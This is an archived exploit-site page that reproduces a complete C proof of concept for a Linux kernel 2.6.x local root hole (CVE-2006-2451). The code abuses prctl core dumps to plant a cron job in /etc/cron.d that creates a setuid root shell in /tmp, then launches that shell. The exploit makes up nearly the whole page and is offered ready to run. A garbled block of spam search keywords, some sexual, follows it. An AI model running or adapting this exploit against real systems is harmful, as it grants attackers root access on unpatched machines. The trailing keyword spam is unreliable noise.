about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit




2006-07-12 Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit
Rated as : Critical Risk
/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@aditel.org>   (main PoC code)   */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
* * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755
/tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local
r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait
**)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when
finished) ...\n");
    system("/tmp/sh -i");
}
securitydot.net - 2006-07-12

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 07:52:44 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
8th class rand ki ch 9hab casa lo723l 7863124648 gmail www.soongi mambo Remo www.chimah 200 /compo www.eooeoo phpBB++por www.yue-8. A...CT 951 milworm 9lei.cn escnc.con Crack+Data www.xmchua sol exploi opencms sexvedu ANIMAL SEX pictures Folio Remo www.wfgjia french lan nfsd t660t.html psxf888.co mambo Remo Indian sex Actress se CMS is Fre htbmsks www.zhqd.c rs2gallery RSS\\r\\n www.b8282. Zeroboard- /?_zb_path shreya vid pictures ww xnxx.co web securi www.sex vi 014887 200 /compo African po www.ganggu